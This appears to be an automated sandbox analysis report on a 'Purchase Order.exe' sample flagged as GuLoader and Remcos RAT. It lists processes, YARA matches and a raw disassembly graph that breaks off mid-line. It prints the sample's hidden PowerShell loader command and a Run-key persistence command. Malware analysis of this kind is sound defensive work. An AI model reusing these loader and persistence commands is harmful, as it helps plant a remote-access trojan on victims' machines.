                                                        Location: https://kxwbha.am.files.1drv.com/y4mpeceYAMLWx5PShbJGMk6tKW6mQBechZgu3aTbJoU6yxz1XJ53X1sSgh53U1m7pv4fA1MzcbPI83B_rXGbHf-ALSMmG7RkEdUQfjG2DyUucMWek9XIj3tn-7NAvq05pAnKWs1FMqyEpy_p6z5TEzLcKsUS12WYssawolVl0gOo85JGvcYIGUARfgxfUiP2PHZImAlpS5vGCbqTzkD6Gn_lQ/kDJUXtnufqHS82.bin?download&psid=1
                                                        Set-Cookie: E=P:V+AzugFz3Ig=:Zqcl3ZNb2DqYW5w/XxAGG3eBDZpKUcfktZAAbv85CHg=:F; domain=.live.com; path=/
                                                        Set-Cookie: xid=6ea35cc1-ef79-4469-ab4b-b73da4724b9f&&ODSP-ODWEB-ODCF&173; domain=.live.com; path=/
                                                        Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                        Set-Cookie: LD=; domain=.live.com; expires=Mon, 13-May-2024 02:24:03 GMT; path=/
                                                        Set-Cookie: wla42=; domain=live.com; expires=Mon, 20-May-2024 04:04:04 GMT; path=/
                                                        X-Content-Type-Options: nosniff
                                                        Strict-Transport-Security: max-age=31536000
                                                        X-MSNServer: 5f77c98dd4-hkqzl
                                                        X-ODWebServer: namsouthce155880-odwebpl
                                                        X-Cache: CONFIG_NOCACHE
                                                        X-MSEdge-Ref: Ref A: 389F65DCB5184660A881CD35E2D87B35 Ref B: BY3EDGE0520 Ref C: 2024-05-13T04:04:03Z
                                                        Date: Mon, 13 May 2024 04:04:03 GMT
                                                        Connection: close
                                                        Content-Length: 0


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:06:02:46
                                                        Start date:13/05/2024
                                                        Path:C:\Users\user\Desktop\Purchase Order.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\Purchase Order.exe"
                                                        Imagebase:0x400000
                                                        File size:580'232 bytes
                                                        MD5 hash:996CD1A4008E0FCA3750E9524BD13A9D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:06:02:48
                                                        Start date:13/05/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"
                                                        Imagebase:0x2d0000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2752200135.000000000B5E5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:06:02:48
                                                        Start date:13/05/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:4
                                                        Start time:06:02:49
                                                        Start date:13/05/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
                                                        Imagebase:0x790000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:7
                                                        Start time:06:03:51
                                                        Start date:13/05/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe"
                                                        Imagebase:0x400000
                                                        File size:580'232 bytes
                                                        MD5 hash:996CD1A4008E0FCA3750E9524BD13A9D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3203656499.000000000788F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 8%, ReversingLabs
                                                        • Detection: 21%, Virustotal, Browse
                                                        Reputation:low
                                                        Has exited:false

                                                        General

                                                        Target ID:8
                                                        Start time:06:04:01
                                                        Start date:13/05/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)"
                                                        Imagebase:0x790000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:9
                                                        Start time:06:04:01
                                                        Start date:13/05/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:10
                                                        Start time:06:04:01
                                                        Start date:13/05/2024
                                                        Path:C:\Windows\SysWOW64\reg.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)"
                                                        Imagebase:0x110000
                                                        File size:59'392 bytes
                                                        MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:25%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:23.1%
                                                          Total number of Nodes:1249
                                                          Total number of Limit Nodes:35
                                                          execution_graph 2697 403a41 2698 403b94 2697->2698 2699 403a59 2697->2699 2701 403be5 2698->2701 2702 403ba5 GetDlgItem GetDlgItem 2698->2702 2699->2698 2700 403a65 2699->2700 2703 403a70 SetWindowPos 2700->2703 2704 403a83 2700->2704 2706 403c3f 2701->2706 2714 401389 2 API calls 2701->2714 2705 403f14 19 API calls 2702->2705 2703->2704 2708 403aa0 2704->2708 2709 403a88 ShowWindow 2704->2709 2710 403bcf SetClassLongA 2705->2710 2715 403b8f 2706->2715 2767 403f60 2706->2767 2711 403ac2 2708->2711 2712 403aa8 DestroyWindow 2708->2712 2709->2708 2713 40140b 2 API calls 2710->2713 2717 403ac7 SetWindowLongA 2711->2717 2718 403ad8 2711->2718 2716 403e9d 2712->2716 2713->2701 2719 403c17 2714->2719 2716->2715 2726 403ece ShowWindow 2716->2726 2717->2715 2722 403b81 2718->2722 2723 403ae4 GetDlgItem 2718->2723 2719->2706 2724 403c1b SendMessageA 2719->2724 2720 40140b 2 API calls 2738 403c51 2720->2738 2721 403e9f DestroyWindow EndDialog 2721->2716 2804 403f7b 2722->2804 2727 403b14 2723->2727 2728 403af7 SendMessageA IsWindowEnabled 2723->2728 2724->2715 2726->2715 2730 403b21 2727->2730 2731 403b68 SendMessageA 2727->2731 2732 403b34 2727->2732 2741 403b19 2727->2741 2728->2715 2728->2727 2730->2731 2730->2741 2731->2722 2735 403b51 2732->2735 2736 403b3c 2732->2736 2734 403f14 19 API calls 2734->2738 2740 40140b 2 API calls 2735->2740 2798 40140b 2736->2798 2737 403b4f 2737->2722 2738->2715 2738->2720 2738->2721 2738->2734 2758 403ddf DestroyWindow 2738->2758 2770 405d51 2738->2770 2788 403f14 2738->2788 2742 403b58 2740->2742 2801 403eed 2741->2801 2742->2722 2742->2741 2744 403ccc GetDlgItem 2745 403ce1 2744->2745 2746 403ce9 ShowWindow KiUserCallbackDispatcher 2744->2746 2745->2746 2791 403f36 KiUserCallbackDispatcher 2746->2791 2748 403d13 EnableWindow 2751 403d27 2748->2751 2749 403d2c GetSystemMenu EnableMenuItem SendMessageA 2750 403d5c SendMessageA 2749->2750 2749->2751 2750->2751 2751->2749 2792 403f49 SendMessageA 2751->2792 2793 405d2f lstrcpynA 2751->2793 2754 403d8a lstrlenA 2755 405d51 18 API calls 2754->2755 2756 403d9b SetWindowTextA 2755->2756 2794 401389 2756->2794 2758->2716 2759 403df9 CreateDialogParamA 2758->2759 2759->2716 2760 403e2c 2759->2760 2761 403f14 19 API calls 2760->2761 2762 403e37 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2761->2762 2763 401389 2 API calls 2762->2763 2764 403e7d 2763->2764 2764->2715 2765 403e85 ShowWindow 2764->2765 2766 403f60 SendMessageA 2765->2766 2766->2716 2768 403f78 2767->2768 2769 403f69 SendMessageA 2767->2769 2768->2738 2769->2768 2775 405d5e 2770->2775 2771 405f81 2772 405f96 2771->2772 2834 405d2f lstrcpynA 2771->2834 2772->2738 2774 405dff GetVersion 2774->2775 2775->2771 2775->2774 2776 405f58 lstrlenA 2775->2776 2779 405d51 10 API calls 2775->2779 2781 405e77 GetSystemDirectoryA 2775->2781 2782 405e8a GetWindowsDirectoryA 2775->2782 2784 405ebe SHGetSpecialFolderLocation 2775->2784 2785 405d51 10 API calls 2775->2785 2786 405f01 lstrcatA 2775->2786 2818 405c16 RegOpenKeyExA 2775->2818 2823 405f9a 2775->2823 2832 405c8d wsprintfA 2775->2832 2833 405d2f lstrcpynA 2775->2833 2776->2775 2779->2776 2781->2775 2782->2775 2784->2775 2787 405ed6 SHGetPathFromIDListA CoTaskMemFree 2784->2787 2785->2775 2786->2775 2787->2775 2789 405d51 18 API calls 2788->2789 2790 403f1f SetDlgItemTextA 2789->2790 2790->2744 2791->2748 2792->2751 2793->2754 2795 401390 2794->2795 2796 4013fe 2795->2796 2797 4013cb MulDiv SendMessageA 2795->2797 2796->2738 2797->2795 2799 401389 2 API calls 2798->2799 2800 401420 2799->2800 2800->2741 2802 403ef4 2801->2802 2803 403efa SendMessageA 2801->2803 2802->2803 2803->2737 2805 403f93 GetWindowLongA 2804->2805 2815 40401c 2804->2815 2806 403fa4 2805->2806 2805->2815 2807 403fb3 GetSysColor 2806->2807 2808 403fb6 2806->2808 2807->2808 2809 403fc6 SetBkMode 2808->2809 2810 403fbc SetTextColor 2808->2810 2811 403fe4 2809->2811 2812 403fde GetSysColor 2809->2812 2810->2809 2813 403feb SetBkColor 2811->2813 2814 403ff5 2811->2814 2812->2811 2813->2814 2814->2815 2816 404008 DeleteObject 2814->2816 2817 40400f CreateBrushIndirect 2814->2817 2815->2715 2816->2817 2817->2815 2819 405c87 2818->2819 2820 405c49 RegQueryValueExA 2818->2820 2819->2775 2821 405c6a RegCloseKey 2820->2821 2821->2819 2829 405fa6 2823->2829 2824 40600e 2825 406012 CharPrevA 2824->2825 2828 40602d 2824->2828 2825->2824 2826 406003 CharNextA 2826->2824 2826->2829 2828->2775 2829->2824 2829->2826 2830 405ff1 CharNextA 2829->2830 2831 405ffe CharNextA 2829->2831 2835 4057cc 2829->2835 2830->2829 2831->2826 2832->2775 2833->2775 2834->2772 2836 4057d2 2835->2836 2837 4057e5 2836->2837 2838 4057d8 CharNextA 2836->2838 2837->2829 2838->2836 3565 401cc2 3566 402a1d 18 API calls 3565->3566 3567 401cd2 SetWindowLongA 3566->3567 3568 4028cf 3567->3568 3569 401a43 3570 402a1d 18 API calls 3569->3570 3571 401a49 3570->3571 3572 402a1d 18 API calls 3571->3572 3573 4019f3 3572->3573 2946 401e44 2947 402a3a 18 API calls 2946->2947 2948 401e4a 2947->2948 2949 404f48 25 API calls 2948->2949 2950 401e54 2949->2950 2962 4054c0 CreateProcessA 2950->2962 2952 401eb0 CloseHandle 2954 4026a6 2952->2954 2953 401e5a 2953->2952 2953->2954 2955 401e79 WaitForSingleObject 2953->2955 2965 406104 2953->2965 2955->2953 2956 401e87 GetExitCodeProcess 2955->2956 2957 401ea4 2956->2957 2958 401e99 2956->2958 2957->2952 2961 401ea2 2957->2961 2969 405c8d wsprintfA 2958->2969 2961->2952 2963 4054f3 CloseHandle 2962->2963 2964 4054ff 2962->2964 2963->2964 2964->2953 2966 406121 PeekMessageA 2965->2966 2967 406131 2966->2967 2968 406117 DispatchMessageA 2966->2968 2967->2955 2968->2966 2969->2961 3574 402644 3575 40264a 3574->3575 3576 402652 FindClose 3575->3576 3577 4028cf 3575->3577 3576->3577 3578 4048c5 GetDlgItem GetDlgItem 3579 404917 7 API calls 3578->3579 3591 404b2f 3578->3591 3580 4049ba DeleteObject 3579->3580 3581 4049ad SendMessageA 3579->3581 3582 4049c3 3580->3582 3581->3580 3584 4049fa 3582->3584 3585 405d51 18 API calls 3582->3585 3583 404c13 3587 404cbf 3583->3587 3593 404b22 3583->3593 3598 404c6c SendMessageA 3583->3598 3586 403f14 19 API calls 3584->3586 3588 4049dc SendMessageA SendMessageA 3585->3588 3592 404a0e 3586->3592 3589 404cd1 3587->3589 3590 404cc9 SendMessageA 3587->3590 3588->3582 3600 404ce3 ImageList_Destroy 3589->3600 3601 404cea 3589->3601 3609 404cfa 3589->3609 3590->3589 3591->3583 3612 404ba0 3591->3612 3631 404813 SendMessageA 3591->3631 3597 403f14 19 API calls 3592->3597 3594 403f7b 8 API calls 3593->3594 3599 404eb5 3594->3599 3595 404c05 SendMessageA 3595->3583 3613 404a1c 3597->3613 3598->3593 3603 404c81 SendMessageA 3598->3603 3600->3601 3604 404cf3 GlobalFree 3601->3604 3601->3609 3602 404e69 3602->3593 3607 404e7b ShowWindow GetDlgItem ShowWindow 3602->3607 3606 404c94 3603->3606 3604->3609 3605 404af0 GetWindowLongA SetWindowLongA 3608 404b09 3605->3608 3614 404ca5 SendMessageA 3606->3614 3607->3593 3610 404b27 3608->3610 3611 404b0f ShowWindow 3608->3611 3609->3602 3622 404d35 3609->3622 3636 404893 3609->3636 3630 403f49 SendMessageA 3610->3630 3629 403f49 SendMessageA 3611->3629 3612->3583 3612->3595 3613->3605 3615 404aea 3613->3615 3618 404a6b SendMessageA 3613->3618 3619 404aa7 SendMessageA 3613->3619 3620 404ab8 SendMessageA 3613->3620 3614->3587 3615->3605 3615->3608 3618->3613 3619->3613 3620->3613 3623 404d79 3622->3623 3625 404d63 SendMessageA 3622->3625 3624 404e3f InvalidateRect 3623->3624 3628 404ded SendMessageA SendMessageA 3623->3628 3624->3602 3626 404e55 3624->3626 3625->3623 3645 4047ce 3626->3645 3628->3623 3629->3593 3630->3591 3632 404872 SendMessageA 3631->3632 3633 404836 GetMessagePos ScreenToClient SendMessageA 3631->3633 3634 40486a 3632->3634 3633->3634 3635 40486f 3633->3635 3634->3612 3635->3632 3648 405d2f lstrcpynA 3636->3648 3638 4048a6 3649 405c8d wsprintfA 3638->3649 3640 4048b0 3641 40140b 2 API calls 3640->3641 3642 4048b9 3641->3642 3650 405d2f lstrcpynA 3642->3650 3644 4048c0 3644->3622 3651 404709 3645->3651 3647 4047e3 3647->3602 3648->3638 3649->3640 3650->3644 3652 40471f 3651->3652 3653 405d51 18 API calls 3652->3653 3654 404783 3653->3654 3655 405d51 18 API calls 3654->3655 3656 40478e 3655->3656 3657 405d51 18 API calls 3656->3657 3658 4047a4 lstrlenA wsprintfA SetDlgItemTextA 3657->3658 3658->3647 3659 4026c6 3660 402a3a 18 API calls 3659->3660 3661 4026d4 3660->3661 3662 4026ea 3661->3662 3663 402a3a 18 API calls 3661->3663 3664 40597d 2 API calls 3662->3664 3663->3662 3665 4026f0 3664->3665 3687 4059a2 GetFileAttributesA CreateFileA 3665->3687 3667 4026fd 3668 4027a0 3667->3668 3669 402709 GlobalAlloc 3667->3669 3672 4027a8 DeleteFileA 3668->3672 3673 4027bb 3668->3673 3670 402722 3669->3670 3671 402797 CloseHandle 3669->3671 3688 4030c7 SetFilePointer 3670->3688 3671->3668 3672->3673 3675 402728 3676 4030b1 ReadFile 3675->3676 3677 402731 GlobalAlloc 3676->3677 3678 402741 3677->3678 3679 402775 3677->3679 3681 402e9f 32 API calls 3678->3681 3680 405a49 WriteFile 3679->3680 3682 402781 GlobalFree 3680->3682 3686 40274e 3681->3686 3683 402e9f 32 API calls 3682->3683 3684 402794 3683->3684 3684->3671 3685 40276c GlobalFree 3685->3679 3686->3685 3687->3667 3688->3675 3689 402847 3690 402a1d 18 API calls 3689->3690 3691 40284d 3690->3691 3692 40287e 3691->3692 3693 4026a6 3691->3693 3694 40285b 3691->3694 3692->3693 3695 405d51 18 API calls 3692->3695 3694->3693 3697 405c8d wsprintfA 3694->3697 3695->3693 3697->3693 3698 4022c7 3699 402a3a 18 API calls 3698->3699 3700 4022d8 3699->3700 3701 402a3a 18 API calls 3700->3701 3702 4022e1 3701->3702 3703 402a3a 18 API calls 3702->3703 3704 4022eb GetPrivateProfileStringA 3703->3704 3109 401bca 3110 402a1d 18 API calls 3109->3110 3111 401bd1 3110->3111 3112 402a1d 18 API calls 3111->3112 3113 401bdb 3112->3113 3114 401beb 3113->3114 3116 402a3a 18 API calls 3113->3116 3115 401bfb 3114->3115 3117 402a3a 18 API calls 3114->3117 3118 401c06 3115->3118 3119 401c4a 3115->3119 3116->3114 3117->3115 3120 402a1d 18 API calls 3118->3120 3121 402a3a 18 API calls 3119->3121 3122 401c0b 3120->3122 3123 401c4f 3121->3123 3125 402a1d 18 API calls 3122->3125 3124 402a3a 18 API calls 3123->3124 3126 401c58 FindWindowExA 3124->3126 3127 401c14 3125->3127 3130 401c76 3126->3130 3128 401c3a SendMessageA 3127->3128 3129 401c1c SendMessageTimeoutA 3127->3129 3128->3130 3129->3130 3489 401751 3490 402a3a 18 API calls 3489->3490 3491 401758 3490->3491 3492 401776 3491->3492 3493 40177e 3491->3493 3528 405d2f lstrcpynA 3492->3528 3529 405d2f lstrcpynA 3493->3529 3496 40177c 3500 405f9a 5 API calls 3496->3500 3497 401789 3498 4057a1 3 API calls 3497->3498 3499 40178f lstrcatA 3498->3499 3499->3496 3513 40179b 3500->3513 3501 406033 2 API calls 3501->3513 3502 40597d 2 API calls 3502->3513 3504 4017b2 CompareFileTime 3504->3513 3505 401876 3506 404f48 25 API calls 3505->3506 3508 401880 3506->3508 3507 404f48 25 API calls 3509 401862 3507->3509 3510 402e9f 32 API calls 3508->3510 3512 401893 3510->3512 3511 405d2f lstrcpynA 3511->3513 3514 4018a7 SetFileTime 3512->3514 3516 4018b9 FindCloseChangeNotification 3512->3516 3513->3501 3513->3502 3513->3504 3513->3505 3513->3511 3515 405d51 18 API calls 3513->3515 3524 405525 MessageBoxIndirectA 3513->3524 3526 40184d 3513->3526 3527 4059a2 GetFileAttributesA CreateFileA 3513->3527 3514->3516 3515->3513 3516->3509 3517 4018ca 3516->3517 3518 4018e2 3517->3518 3519 4018cf 3517->3519 3520 405d51 18 API calls 3518->3520 3521 405d51 18 API calls 3519->3521 3523 4018ea 3520->3523 3522 4018d7 lstrcatA 3521->3522 3522->3523 3525 405525 MessageBoxIndirectA 3523->3525 3524->3513 3525->3509 3526->3507 3526->3509 3527->3513 3528->3496 3529->3497 3708 401651 3709 402a3a 18 API calls 3708->3709 3710 401657 3709->3710 3711 406033 2 API calls 3710->3711 3712 40165d 3711->3712 3713 401951 3714 402a1d 18 API calls 3713->3714 3715 401958 3714->3715 3716 402a1d 18 API calls 3715->3716 3717 401962 3716->3717 3718 402a3a 18 API calls 3717->3718 3719 40196b 3718->3719 3720 40197e lstrlenA 3719->3720 3725 4019b9 3719->3725 3721 401988 3720->3721 3721->3725 3726 405d2f lstrcpynA 3721->3726 3723 4019a2 3724 4019af lstrlenA 3723->3724 3723->3725 3724->3725 3726->3723 3727 404352 3728 40437e 3727->3728 3729 40438f 3727->3729 3788 405509 GetDlgItemTextA 3728->3788 3731 40439b GetDlgItem 3729->3731 3764 4043fa 3729->3764 3733 4043af 3731->3733 3732 404389 3734 405f9a 5 API calls 3732->3734 3736 4043c3 SetWindowTextA 3733->3736 3742 40583a 4 API calls 3733->3742 3734->3729 3740 403f14 19 API calls 3736->3740 3737 404688 3741 403f7b 8 API calls 3737->3741 3738 405d51 18 API calls 3743 40446e SHBrowseForFolderA 3738->3743 3739 40450e 3744 40588f 18 API calls 3739->3744 3745 4043df 3740->3745 3746 40469c 3741->3746 3747 4043b9 3742->3747 3748 404486 CoTaskMemFree 3743->3748 3749 4044de 3743->3749 3750 404514 3744->3750 3751 403f14 19 API calls 3745->3751 3747->3736 3754 4057a1 3 API calls 3747->3754 3752 4057a1 3 API calls 3748->3752 3749->3737 3790 405509 GetDlgItemTextA 3749->3790 3791 405d2f lstrcpynA 3750->3791 3753 4043ed 3751->3753 3755 404493 3752->3755 3789 403f49 SendMessageA 3753->3789 3754->3736 3758 4044ca SetDlgItemTextA 3755->3758 3763 405d51 18 API calls 3755->3763 3758->3749 3759 4043f3 3761 4060c8 5 API calls 3759->3761 3760 40452b 3762 4060c8 5 API calls 3760->3762 3761->3764 3771 404532 3762->3771 3765 4044b2 lstrcmpiA 3763->3765 3764->3737 3764->3738 3764->3749 3765->3758 3768 4044c3 lstrcatA 3765->3768 3766 40456e 3792 405d2f lstrcpynA 3766->3792 3768->3758 3769 404575 3770 40583a 4 API calls 3769->3770 3772 40457b GetDiskFreeSpaceA 3770->3772 3771->3766 3774 4057e8 2 API calls 3771->3774 3776 4045c6 3771->3776 3775 40459f MulDiv 3772->3775 3772->3776 3774->3771 3775->3776 3777 404637 3776->3777 3778 4047ce 21 API calls 3776->3778 3779 40465a 3777->3779 3781 40140b 2 API calls 3777->3781 3780 404624 3778->3780 3793 403f36 KiUserCallbackDispatcher 3779->3793 3783 404639 SetDlgItemTextA 3780->3783 3784 404629 3780->3784 3781->3779 3783->3777 3786 404709 21 API calls 3784->3786 3785 404676 3785->3737 3794 4042e7 3785->3794 3786->3777 3788->3732 3789->3759 3790->3739 3791->3760 3792->3769 3793->3785 3795 4042f5 3794->3795 3796 4042fa SendMessageA 3794->3796 3795->3796 3796->3737 3797 4019d2 3798 402a3a 18 API calls 3797->3798 3799 4019d9 3798->3799 3800 402a3a 18 API calls 3799->3800 3801 4019e2 3800->3801 3802 4019e9 lstrcmpiA 3801->3802 3803 4019fb lstrcmpA 3801->3803 3804 4019ef 3802->3804 3803->3804 3805 4021d2 3806 402a3a 18 API calls 3805->3806 3807 4021d8 3806->3807 3808 402a3a 18 API calls 3807->3808 3809 4021e1 3808->3809 3810 402a3a 18 API calls 3809->3810 3811 4021ea 3810->3811 3812 406033 2 API calls 3811->3812 3813 4021f3 3812->3813 3814 402204 lstrlenA lstrlenA 3813->3814 3818 4021f7 3813->3818 3816 404f48 25 API calls 3814->3816 3815 404f48 25 API calls 3819 4021ff 3815->3819 3817 402240 SHFileOperationA 3816->3817 3817->3818 3817->3819 3818->3815 3818->3819 3551 4014d6 3552 402a1d 18 API calls 3551->3552 3553 4014dc Sleep 3552->3553 3555 4028cf 3553->3555 3560 40155b 3561 401577 ShowWindow 3560->3561 3562 40157e 3560->3562 3561->3562 3563 40158c ShowWindow 3562->3563 3564 4028cf 3562->3564 3563->3564 3820 40255c 3821 402a1d 18 API calls 3820->3821 3823 402566 3821->3823 3822 4025d0 3823->3822 3824 405a1a ReadFile 3823->3824 3825 4025d2 3823->3825 3828 4025e2 3823->3828 3824->3823 3829 405c8d wsprintfA 3825->3829 3827 4025f8 SetFilePointer 3827->3822 3828->3822 3828->3827 3829->3822 3830 40405d 3831 404073 3830->3831 3838 40417f 3830->3838 3835 403f14 19 API calls 3831->3835 3832 4041ee 3833 4042c2 3832->3833 3834 4041f8 GetDlgItem 3832->3834 3840 403f7b 8 API calls 3833->3840 3836 404280 3834->3836 3837 40420e 3834->3837 3839 4040c9 3835->3839 3836->3833 3845 404292 3836->3845 3837->3836 3844 404234 6 API calls 3837->3844 3838->3832 3838->3833 3842 4041c3 GetDlgItem SendMessageA 3838->3842 3841 403f14 19 API calls 3839->3841 3852 4042bd 3840->3852 3843 4040d6 CheckDlgButton 3841->3843 3861 403f36 KiUserCallbackDispatcher 3842->3861 3859 403f36 KiUserCallbackDispatcher 3843->3859 3844->3836 3848 404298 SendMessageA 3845->3848 3849 4042a9 3845->3849 3848->3849 3849->3852 3853 4042af SendMessageA 3849->3853 3850 4041e9 3854 4042e7 SendMessageA 3850->3854 3851 4040f4 GetDlgItem 3860 403f49 SendMessageA 3851->3860 3853->3852 3854->3832 3856 40410a SendMessageA 3857 404131 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3856->3857 3858 404128 GetSysColor 3856->3858 3857->3852 3858->3857 3859->3851 3860->3856 3861->3850 3862 40205e 3863 402a3a 18 API calls 3862->3863 3864 402065 3863->3864 3865 402a3a 18 API calls 3864->3865 3866 40206f 3865->3866 3867 402a3a 18 API calls 3866->3867 3868 402079 3867->3868 3869 402a3a 18 API calls 3868->3869 3870 402083 3869->3870 3871 402a3a 18 API calls 3870->3871 3872 40208d 3871->3872 3873 4020cc CoCreateInstance 3872->3873 3874 402a3a 18 API calls 3872->3874 3877 4020eb 3873->3877 3879 402193 3873->3879 3874->3873 3875 401423 25 API calls 3876 4021c9 3875->3876 3878 402173 MultiByteToWideChar 3877->3878 3877->3879 3878->3879 3879->3875 3879->3876 3880 40265e 3881 402664 3880->3881 3882 402668 FindNextFileA 3881->3882 3883 40267a 3881->3883 3882->3883 3884 4026b9 3882->3884 3886 405d2f lstrcpynA 3884->3886 3886->3883 3887 401cde GetDlgItem GetClientRect 3888 402a3a 18 API calls 3887->3888 3889 401d0e LoadImageA SendMessageA 3888->3889 3890 401d2c DeleteObject 3889->3890 3891 4028cf 3889->3891 3890->3891 2839 401662 2853 402a3a 2839->2853 2842 402a3a 18 API calls 2843 401672 2842->2843 2844 402a3a 18 API calls 2843->2844 2845 40167b MoveFileA 2844->2845 2846 401687 2845->2846 2847 40168e 2845->2847 2866 401423 2846->2866 2851 4021c9 2847->2851 2859 406033 FindFirstFileA 2847->2859 2854 402a46 2853->2854 2855 405d51 18 API calls 2854->2855 2856 402a67 2855->2856 2857 401669 2856->2857 2858 405f9a 5 API calls 2856->2858 2857->2842 2858->2857 2860 40169d 2859->2860 2861 406049 FindClose 2859->2861 2860->2851 2862 405bea MoveFileExA 2860->2862 2861->2860 2863 405c0b 2862->2863 2864 405bfe 2862->2864 2863->2846 2869 405a78 lstrcpyA 2864->2869 2907 404f48 2866->2907 2870 405aa0 2869->2870 2871 405ac6 GetShortPathNameA 2869->2871 2896 4059a2 GetFileAttributesA CreateFileA 2870->2896 2872 405be5 2871->2872 2873 405adb 2871->2873 2872->2863 2873->2872 2875 405ae3 wsprintfA 2873->2875 2877 405d51 18 API calls 2875->2877 2876 405aaa CloseHandle GetShortPathNameA 2876->2872 2878 405abe 2876->2878 2879 405b0b 2877->2879 2878->2871 2878->2872 2897 4059a2 GetFileAttributesA CreateFileA 2879->2897 2881 405b18 2881->2872 2882 405b27 GetFileSize GlobalAlloc 2881->2882 2883 405b49 2882->2883 2884 405bde CloseHandle 2882->2884 2898 405a1a ReadFile 2883->2898 2884->2872 2889 405b68 lstrcpyA 2892 405b8a 2889->2892 2890 405b7c 2891 405907 4 API calls 2890->2891 2891->2892 2893 405bc1 SetFilePointer 2892->2893 2905 405a49 WriteFile 2893->2905 2896->2876 2897->2881 2899 405a38 2898->2899 2899->2884 2900 405907 lstrlenA 2899->2900 2901 405948 lstrlenA 2900->2901 2902 405950 2901->2902 2903 405921 lstrcmpiA 2901->2903 2902->2889 2902->2890 2903->2902 2904 40593f CharNextA 2903->2904 2904->2901 2906 405a67 GlobalFree 2905->2906 2906->2884 2908 401431 2907->2908 2909 404f63 2907->2909 2908->2851 2910 404f80 lstrlenA 2909->2910 2911 405d51 18 API calls 2909->2911 2912 404fa9 2910->2912 2913 404f8e lstrlenA 